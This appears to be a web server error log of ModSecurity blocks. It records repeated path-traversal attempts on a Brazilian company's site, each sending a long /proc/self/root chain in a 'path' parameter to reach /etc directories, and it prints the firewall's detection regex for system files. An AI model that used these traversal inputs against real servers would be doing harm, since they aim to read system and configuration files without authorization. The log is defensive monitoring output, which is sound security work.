[Mon Mar 16 14:52:28.125953 2026] [:error] [pid 21805:tid 140411658000128] [client 74.7.241.46:53872] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhDXLABkC4fWIHEf8H7HgAAAEo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 14:52:28.211580 2026] [:error] [pid 21805:tid 140411590858496] [client 74.7.243.203:48186] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhDXLABkC4fWIHEf8H7HwAAAFI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 14:52:29.519752 2026] [:error] [pid 21806:tid 140411616036608] [client 74.7.241.46:58174] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhDXdSswJuvopo3lOhqEAAAAI8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 14:52:29.633487 2026] [:error] [pid 10772:tid 140411565680384] [client 74.7.243.203:48190] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhDXf9ocpUE4ed4uDz7HwAAAhU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 14:52:30.863955 2026] [:error] [pid 10772:tid 140411599251200] [client 74.7.241.46:58180] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhDXv9ocpUE4ed4uDz7IQAAAhE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 14:52:32.209013 2026] [:error] [pid 10772:tid 140411557287680] [client 74.7.241.46:58188] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhDYP9ocpUE4ed4uDz7JQAAAhY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 14:52:33.386376 2026] [:error] [pid 21805:tid 140411683178240] [client 74.7.241.46:58192] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhDYbABkC4fWIHEf8H7IAAAAEc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 14:52:34.443375 2026] [:error] [pid 10772:tid 140411666392832] [client 74.7.243.203:42544] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhDYv9ocpUE4ed4uDz7KQAAAgk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 14:52:34.759346 2026] [:error] [pid 21805:tid 140411733534464] [client 74.7.241.46:58198] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhDYrABkC4fWIHEf8H7IQAAAEE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 14:52:35.823040 2026] [:error] [pid 14895:tid 140411557287680] [client 74.7.243.203:42550] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhDY1ajLEzk2WiQ-10dbQAAApY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 14:52:44.512586 2026] [:error] [pid 10831:tid 140411649607424] [client 74.7.243.203:42564] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhDbI6lpbStxTqkSkt3TAAAAks"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 14:52:48.104379 2026] [:error] [pid 21805:tid 140411557287680] [client 74.7.243.203:35450] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhDcLABkC4fWIHEf8H7LAAAAFY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 14:52:49.535087 2026] [:error] [pid 14895:tid 140411708356352] [client 74.7.243.203:35452] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhDcVajLEzk2WiQ-10dcQAAAoQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 14:52:50.763682 2026] [:error] [pid 21806:tid 140411607643904] [client 74.7.243.203:33292] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhDctSswJuvopo3lOhqFwAAAJA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 14:52:53.279801 2026] [:error] [pid 21806:tid 140411658000128] [client 74.7.243.203:33302] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhDddSswJuvopo3lOhqGgAAAIo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 14:52:54.633916 2026] [:error] [pid 14895:tid 140411607643904] [client 74.7.243.203:33314] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhDdlajLEzk2WiQ-10dcgAAApA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 14:52:55.020047 2026] [:error] [pid 15061:tid 140411716749056] [client 74.7.241.46:58214] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhDd6TCbgAP5jq5Teg3_AAAAsM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:52:55.905742 2026] [:error] [pid 11972:tid 140411540502272] [client 74.7.243.203:33328] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhDd5qj1wV0Si-Okef6ggAAABg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 14:52:57.272033 2026] [:error] [pid 21806:tid 140411632822016] [client 74.7.243.203:33332] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhDedSswJuvopo3lOhqGwAAAI0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 14:53:04.249497 2026] [:error] [pid 10772:tid 140411632822016] [client 74.7.243.203:33336] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhDgP9ocpUE4ed4uDz7MwAAAg0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 14:53:05.607406 2026] [:error] [pid 21533:tid 140411683178240] [client 74.7.243.203:48422] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhDgXjZBu2q05ozVU9lrwAAAUc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
